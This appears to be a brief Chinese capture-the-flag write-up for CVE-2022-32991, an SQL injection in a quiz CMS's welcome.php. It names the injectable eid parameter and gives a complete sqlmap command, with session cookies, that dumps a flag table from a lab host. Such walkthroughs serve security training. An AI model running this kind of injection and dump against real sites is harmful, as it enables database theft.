CVE-2022-32991

该CMS的welcome.php中存在SQL注入攻击

CVE-2022-32991

随便注册一个用户登录

对各个页面的参数就行sqlmap扫描

最终在Janobe Sourcecode测试出eid参数存在sql注入

sqlmap -u "http://eci-2ze9bpwkd9h3b5v3kfo5.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1706068419,1706092531,1706155955; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1706155955; PHPSESSID=ffu4h67f4fgtpmp0m9cn2gancs" -D ctf -T flag -C flag --dump

得到flag